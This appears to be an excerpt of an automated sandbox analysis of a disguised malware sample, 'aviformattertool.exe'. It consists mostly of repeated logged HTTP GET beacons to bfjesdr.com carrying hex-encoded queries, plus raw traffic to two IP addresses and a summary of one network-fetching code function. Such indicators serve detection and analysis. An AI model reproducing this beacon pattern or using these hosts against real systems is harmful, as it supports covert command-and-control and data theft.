                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: unknown | TCP traffic detected without corresponding DNS query: 65.109.80.185
                Source: unknown | UDP traffic detected without corresponding DNS query: 141.98.234.31
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A172FC Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,3_2_02A172FC
                Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c HTTP/1.1 | Host: bfjesdr.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
